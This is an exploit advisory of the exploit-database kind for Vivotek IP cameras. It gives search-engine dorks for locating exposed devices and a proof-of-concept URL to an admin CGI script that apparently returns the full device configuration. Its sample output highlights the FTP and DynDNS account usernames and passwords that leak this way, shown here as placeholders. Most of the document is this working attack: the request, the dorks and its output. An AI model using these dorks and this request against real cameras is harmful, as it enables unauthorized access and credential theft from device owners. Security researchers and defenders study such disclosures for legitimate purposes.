# Exploit Title: Vivotek Full Data Source CONFIG # Date: 09/07/12 # Author: Alejandro Leon Morales [GothicX] # Author Mail: Gothicx[at]freaknetwork[dot]in # Author Web: www.undermx.blogspot.mx # Sofware web: www.vivotek.com # Vulnerable version: all # Tested on: Microsoft windows 7 / Vista / XP/ MacOS # Dork: "/setup/config.html" ||allinurl:"setup/parafile.html" [PoC] http://server/cgi-bin/admin/getparam.cgi [INFO SENSIBLE] ACCOUNT FTP ACCOUNT DYNDNS [Result] ddns_enable='1' ddns_provider='DyndnsDynamic' ddns_Safe100_hostname='' ddns_Safe100_usernameemail='' ddns_Safe100_passwordkey='' ddns_DyndnsDynamic_hostname='hostname' ddns_DyndnsDynamic_usernameemail='usernameemail' ddns_DyndnsDynamic_passwordkey='passwordkey' ddns_DyndnsCustom_hostname='' ddns_DyndnsCustom_usernameemail='' ddns_DyndnsCustom_passwordkey='' ddns_TZO_hostname='' ddns_TZO_usernameemail='' ddns_TZO_passwordkey='' ddns_DHS_hostname='' ddns_DHS_usernameemail='' ddns_DHS_passwordkey='' ddns_DynInterfree_hostname='' ddns_DynInterfree_usernameemail='' ddns_DynInterfree_passwordkey='' ddns_CustomSafe100_hostname='' ddns_CustomSafe100_usernameemail='' ddns_CustomSafe100_passwordkey='' ddns_CustomSafe100_servername='' server_i0_type='ftp' server_i0_http_url='http://' server_i0_http_username='' server_i0_http_passwd='' server_i0_ftp_address='FTPADDRESS' server_i0_ftp_username='FTPUSERNAME' server_i0_ftp_passwd='FTPPASSWD' server_i0_ftp_port='21' server_i0_ftp_passive='1' server_i0_ftp_location='\\temp\\record' ---------------------------------------------------------------------------------------------------- [Sensitive data] FTP ACCOUNTS: server_i0_ftp_address='FTPADDRESS' server_i0_ftp_username='FTPUSERNAME' server_i0_ftp_passwd='FTPPASSWD' DYNDNS ACCOUNTS: ddns_DyndnsDynamic_hostname='hostname' ddns_DyndnsDynamic_usernameemail='usernameemail' ddns_DyndnsDynamic_passwordkey='passwordkey' //*************************************************************************************// Special Greetz: Maztor, Zeus, Klanx, Makuaz, Alverid, zer0 z0org